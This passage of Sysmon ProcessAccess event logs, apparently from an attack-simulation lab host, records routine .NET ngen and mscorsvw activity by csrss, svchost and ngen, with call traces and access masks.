xe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7672,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.840\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010A1F20B00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.840","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010A1F20B00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7673,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.840\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-0010A1F20B00}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.840","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-0010A1F20B00}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7674,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.887\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001044F60B00}\r\nTargetProcessId: 4768\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.887","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001044F60B00}","TargetProcessId":"4768","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7675,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.887\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001044F60B00}\r\nTargetProcessId: 4768\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.887","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001044F60B00}","TargetProcessId":"4768","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7676,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.887\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001044F60B00}\r\nTargetProcessId: 4768\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.887","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001044F60B00}","TargetProcessId":"4768","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7677,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.918\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001094F90B00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.918","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001094F90B00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7678,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.918\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001094F90B00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.918","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001094F90B00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7679,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:08.918\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1334-5F25-0000-001094F90B00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:08.918","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1334-5F25-0000-001094F90B00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
